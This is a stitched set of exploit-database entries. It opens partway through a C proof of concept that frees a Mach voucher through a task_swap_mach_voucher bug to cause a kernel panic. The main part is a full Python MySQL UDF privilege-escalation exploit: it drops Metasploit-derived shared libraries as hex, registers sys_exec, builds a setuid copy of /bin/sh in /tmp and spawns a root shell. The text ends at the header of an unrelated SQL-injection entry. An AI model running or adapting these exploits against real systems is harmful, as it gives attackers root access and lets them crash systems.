assert(kr == KERN_SUCCESS);
assert(voucher != MACH_PORT_NULL);
return voucher;
}
/*
* voucher_tweak_references
*
* Description:
* Use the task_swap_mach_voucher() vulnerabilities to modify the reference counts of 2
* vouchers.
*
*/
static void
voucher_tweak_references(mach_port_t release_voucher, mach_port_t reference_voucher) {
// Call task_swap_mach_voucher() to tweak the reference counts (two bugs in one!).
mach_port_t inout_voucher = reference_voucher;
kern_return_t kr = task_swap_mach_voucher(mach_task_self(), release_voucher, &inout_voucher);
assert(kr == KERN_SUCCESS);
// At this point we've successfully tweaked the voucher reference counts, but our port
// reference counts might be messed up because of the voucher port returned in
// inout_voucher! We need to deallocate it (it's extra anyways, since
// task_swap_mach_voucher() doesn't swallow the existing send rights).
if (MACH_PORT_VALID(inout_voucher)) {
kr = mach_port_deallocate(mach_task_self(), inout_voucher);
assert(kr == KERN_SUCCESS);
}
}
/*
* voucher_reference
*
* Description:
* Add a reference to the voucher represented by the voucher port.
*/
static void
voucher_reference(mach_port_t voucher) {
voucher_tweak_references(MACH_PORT_NULL, voucher);
}
/*
* voucher_release
*
* Description:
* Release a reference on the voucher represented by the voucher port.
*/
static void
voucher_release(mach_port_t voucher) {
voucher_tweak_references(voucher, MACH_PORT_NULL);
}
/*
* thread_stash_freed_voucher
*
* Description:
* Stash a pointer to a freed voucher object in the current thread's ith_voucher field. This
* voucher can be accessed later with thread_get_mach_voucher().
*/
static void
thread_stash_freed_voucher(mach_port_t thread_self) {
// Create a unique voucher. This voucher will have 1 voucher reference, 2 port references,
// and 1 port send right.
mach_port_t voucher = create_voucher(0);
// Stash a copy of the voucher in our thread. This will bump the voucher references to 2.
kern_return_t kr = thread_set_mach_voucher(thread_self, voucher);
assert(kr == KERN_SUCCESS);
// Now drop the voucher reference count to 1. The port reference count is still 2.
voucher_release(voucher);
// Next deallocate our send right to the voucher port. This drops the port send right
// count to 0 (although the port reference count is still 1), causing a no-senders
// notification to be triggered. The no-senders notification calls ipc_voucher_notify(),
// which releases the final voucher reference. In the process of freeing the voucher,
// ipc_port_dealloc_kernel() is called on the port, so the port is also freed.
kr = mach_port_deallocate(mach_task_self(), voucher);
assert(kr == KERN_SUCCESS);
// This leaves a dangling pointer to the voucher in thread_self->ith_voucher. We can access
// the freed voucher and voucher port with a call to thread_get_mach_voucher().
}
int
main(int argc, const char *argv[]) {
host = mach_host_self();
mach_port_t thread = mach_thread_self();
// Stash a pointer to a freed ipc_voucher_t in this thread's ith_voucher field.
thread_stash_freed_voucher(thread);
// The following call should trigger a panic.
mach_port_t voucher;
thread_get_mach_voucher(thread, 0, &voucher);
return 0;
}
# Exploit Title: MySQL User-Defined (Linux) x32 / x86_64 sys_exec function local privilege escalation exploit
# Date: 24/01/2019
# Exploit Author: d7x
# Vendor Homepage: https://www.mysql.com
# Software Link: www.mysql.com
# Version: MySQL 4.x/5.x
# Tested on: Debian GNU/Linux 8.11 / mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3
# CVE : N/A
'''
*** MySQL User-Defined (Linux) x32 / x86_64 sys_exec function local privilege escalation exploit ***
UDF lib shellcodes retrieved from metasploit
(there are windows .dll libraries within metasploit as well so this could be easily ported to Windows)
Based on the famous raptor_udf.c by Marco Ivaldi (EDB ID: 1518)
CVE: N/A
References:
https://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html
https://www.exploit-db.com/exploits/1518
https://www.exploit-db.com/papers/44139/ - MySQL UDF Exploitation by Osanda Malith Jayathissa (@OsandaMalith)
Tested on 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
'''
import sys
import subprocess
import platform, random
import argparse
import os
import re
import pty
shellcode_x32 = "7f454c4601010100000000000000000003000300010000007009000034000000581200000000000034002000040028001900180001000000000000000000000000000000f80e0000f80e00000500000000100000010000000010000000100000001000000801000010010000060000000010000002000000141000001410000014100000d0000000d0000000060000000400000051e5746400000000000000000000000000000000000000000600000004000000250000002a0000001400000008000000270000001d0000000000000000000000030000000000000011000000000000000a0000002900000012000000200000000000000000000000260000000c0000002100000017000000230000000d000000000000000e0000001c000000150000000000000006000000000000000000000010000000220000000f0000002400000019000000180000000000000000000000000000000000000000000000000000001a0000000200000013000000050000000000000000000000000000000000000000000000000000001f00000001000000280000000000000000000000000000000000000000000000070000002500000016000000000000000b00000000000000000000000000000000000000000000001e0000001b0000000000000000000000090000000000000000000000040000000000000011000000130000000400000007000000010804409019c7c9bda4080390046083130000001500000016000000180000001a0000001c0000001f00000021000000000000002200000000000000230000002400000026000000280000002900000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe1200000000000000000000000000000000e7000000000000008d00000012000000c2000000000000005c00000012000000ba00000000000000e7040000120000000100000000000000000000002000000025000000000000000000000020000000ed000000000000007e02000012000000ab01000000000000150100001200000079010000000000007d00000012000000c700000000000000c600000012000000f50000000000000071010000120000009e01000000000000fb00000012000000cf00000000000000700000001200000010010000000000002500000012000000e0000000000000008901000012000000b500000000000000a80200001200000016000000000000000b0100002200000088010000000000007400000012000000fb00000000000000230000001200000080010000040d00006100000012000b00750000003b0a00000500000012000b0010000000f80d00000000000012000c003f010000a10c00002500000012000b001f010000100900000000000012000900c301000008110000000000001000f1ff96000000470a00000500000012000b0070010000ee0c00001600000012000b00cf01000010110000000000001000f1ff56000000310a00000500000012000b00020100009c0b00003000000012000b00a30100007d0d00003e00000012000b00390000002c0a00000500000012000b00320100006b0c00003600000012000b00bc01000008110000000000001000f1ff65000000360a00000500000012000b0025010000fc0b00006f00000012000b0085000000400a00000700000012000b0017010000cc0b00003000000012000b0055010000c60c00002800000012000b00a90000004c0a00008800000012000b008f010000650d00001800000012000b00d7000000d40a0000c800000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3000474c4942435f322e310000000200030003000000000003000300030003000300030003000300030003000400030002000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000300b20100001000000000000000731f690900000400d4010000100000001069690d00000300e0010000100000001169690d00000200ea01000000000000040b000008000000b70b000008000000e70b000008000000110c000008000000220c000008000000550c0000080000008e0c000008000000ac0c000008000000d90c00000800000004110000080000006b0a0000020f00007c0a000002030000960a000002020000ad0a000002090000430b000002090000bc0a0000020c0000e40a0000020e0000f30a0000020e00003f0c0000020e00000e0b000002010000310b000002060000560b0000020a0000680b000002120000bf0b0000020d0000ef0b0000020d00005b0c0000020d0000960c0000020d0000b20c0000020d0000e10c0000020d0000fd0c000002080000580d000002110000770d0000020b00008e0d000002070000e410000006040000e810000006050000ec10000006100000fc1000000704000000110000071000005589e55383ec04e8000000005b81c3d40700008b93f4ffffff85d27405e81e000000e8b9000000e884040000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff5589e55653e8ad00000081c37607000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8bcffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c3f706000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35531c089e55dc35589e55dc35589e557565383ec0cfc83c9ff8b750c8b46088b3831c0f2aef7d18d59ffe8fcffffff83f8007c53753f83ec0c6a1ee8fcffffff5f596a006a00486a218d1418f7d06a0721d0506a00e8fcffffff83c42083f8ff89c7742351538b4608ff3057e8fcffffffffd7eb0b526a016a0050e8fcffffff31c083c410eb05b8010000008d65f45b5e5f5dc35589e557565383ec18fc6800040000e8fcffffffc70424010000008945e8e8fcffffffc6000089c68b450c595b31db68840e00008b4008ff30e8fcffffff8945eceb338b7de831c083c9fff2ae5252f7d18d79ff8d043b50568945f0e8fcffffff83c40c57ff75e889c68d041850e8fcffffff8b5df083c40cff75ec6a04ff75e8e8fcffffff83c41085c075b683ec0cff75ece8fcffffff83c410803e0075088b4518c60001eb16c6441eff0031c083c9ff89f7f2ae8b4514f7d14989088d65f489f05b5e5f5dc35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e55383ec048b550c8b5d10833a0274095050683f0e0000eb428b420483380074095050685e0e0000eb318b520c83ec0cc74004000000008b0283c00203420450e8fcffffff8b550883c41089420c31d285c07512505068860e000053e8fcffffffb20183c41088d08b5dfcc9c35589e583ec088b450c83380175128b4004833800750a8b4508c6000131c0eb14505068140e0000ff7510e8fcffffffb00183c410c9c35589e55383ec0c8b5d1068a00e000053e8fcffffff8b4514c7001e00000089d88b5dfcc9c35531d289e583ec088b450c8338007414525268bf0e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec148b450c8b4008ff30e8fcffffffc999c35589e557565383ec10fc8b550c8b45088b580c8b420c89df8b088d440b018945e88b42088b30f3a48b420c8b00c60403008b42088b4a0c8b7de88b70048b4904f3a48b420c8b55e88b4004c60402006a015253e8fcffffff8d65f45b5e5f5d99c35589e58b45088b400c85c074098945085de9fcffffff5dc35589e55783ec10fc8b450c8b4008ff30e8fcffffff83c41085c089c275088b4518c60001eb1131c083c9ff89d7f2ae8b4514f7d149890889d08b7dfcc9c390909090905589e55653e85dfcffff81c3260300008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c3ec020000e860fbffff595bc9c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000b20100000c000000100900000d000000f80d000004000000b4000000f5feff6ff8010000050000005805000006000000b80200000a000000f40100000b0000001000000003000000f010000002000000100000001400000011000000170000000009000011000000e0070000120000002001000013000000080000001600000000000000feffff6fa0070000ffffff6f01000000f0ffff6f4c070000faffff6f0a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000141000000000000000000000560900006609000004110000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000b4000000b400000044010000030000000000000004000000040000000b000000f6ffff6f02000000f8010000f8010000c000000003000000000000000400000004000000150000000b00000002000000b8020000b8020000a0020000040000000100000004000000100000001d00000003000000020000005805000058050000f40100000000000000000000010000000000000025000000ffffff6f020000004c0700004c070000540000000300000000000000020000000200000032000000feffff6f02000000a0070000a00700004000000004000000010000000400000000000000410000000900000002000000e0070000e007000020010000030000000000000004000000080000004a0000000900000002000000000900000009000010000000030000000a0000000400000008000000530000000100000006000000100900001009000030000000000000000000000004000000000000004e000000010000000600000040090000400900003000000000000000000000000400000004000000590000000100000006000000700900007009000088040000000000000000000010000000000000005f0000000100000006000000f80d0000f80d00001c00000000000000000000000400000000000000650000000100000032000000140e0000140e0000dd000000000000000000000001000000010000006d0000000100000002000000f40e0000f40e00000400000000000000000000000400000000000000770000000100000003000000001000000010000008000000000000000000000004000000000000007e000000010000000300000008100000081000000800000000000000000000000400000000000000850000000100000003000000101000001010000004000000000000000000000004000000000000008a00000006000000030000001410000014100000d000000004000000000000000400000008000000930000000100000003000000e4100000e41000000c00000000000000000000000400000004000000980000000100000003000000f0100000f01000001400000000000000000000000400000004000000a1000000010000000300000004110000041100000400000000000000000000000400000000000000a7000000080000000300000008110000081100000800000000000000000000000400000000000000ac000000010000000000000000000000081100009b0000000000000000000000010000000000000001000000030000000000000000000000a3110000b500000000000000000000000100000000000000";
shellcode_x64 = "7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000";
shellcode = shellcode_x32
if (platform.architecture()[0] == '64bit'):
shellcode = shellcode_x64
# MySQL username and password: make sure you have FILE privileges and mysql is actually running as root
# username='root'
# password=''
###
#if len(sys.argv) != 2:
# print "Usage: %s <username> <password>" % argv[0]
#username=sys.argv[1];
#password=sys.argv[2];
###
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True)
parser.add_argument('--password', '-p', help='MySQL password', type=str)
args = parser.parse_args()
username=args.username
password=args.password
if not password:
password=''
cmd='mysql -u root -p\'' + password + '\' -e "select @@plugin_dir \G"'
plugin_str = subprocess.check_output(cmd, shell=True)
plugin_dir = re.search('@plugin_dir: (\S*)', plugin_str)
res = bool(plugin_dir)
if not res:
print "Error: could not locate the plugin directory"
os.exit(1);
plugin_dir_ = plugin_dir.group(1)
print "Plugin dir is %s" % plugin_dir_
# file to save the udf so file to
udf_filename = 'udf' + str(random.randint(1000,10000)) + '.so'
udf_outfile = plugin_dir_ + udf_filename
# alternative way:
# set @outputpath := @@plugin_dir; set @outputpath := @@plugin_dir;
print "Trying to create a udf library...";
os.system('mysql -u root -p\'' + password + '\' -e "select binary 0x' + shellcode + ' into dumpfile \'%s\' \G"' % udf_outfile)
res = os.path.isfile(udf_outfile)
if not res:
print "Error: could not create udf file in %s (mysql is either not running as root or may be file exists?)" % udf_outfile
os.exit(1);
print "UDF library crated successfully: %s" % udf_outfile;
print "Trying to create sys_exec..."
os.system('mysql -u root -p\'' + password + '\' -e "create function sys_exec returns int soname \'%s\'\G"' % udf_filename)
print "Checking if sys_exec was crated..."
cmd='mysql -u root -p\'' + password + '\' -e "select * from mysql.func where name=\'sys_exec\' \G"';
res = subprocess.check_output(cmd, shell=True);
if (res == ''):
print "sys_exec was not found (good luck next time!)"
if res:
print "sys_exec was found: %s" % res
print "Generating a suid binary in /tmp/sh..."
os.system('mysql -u root -p\'' + password + '\' -e "select sys_exec(\'cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh\')"')
print "Trying to spawn a root shell..."
pty.spawn("/tmp/sh");
# Exploit Title: CMSsite 1.0 - SQL injection
# Exploit Author : Majid kalantari (mjd.hack@gmail.com)
# Date: 2019-01-27
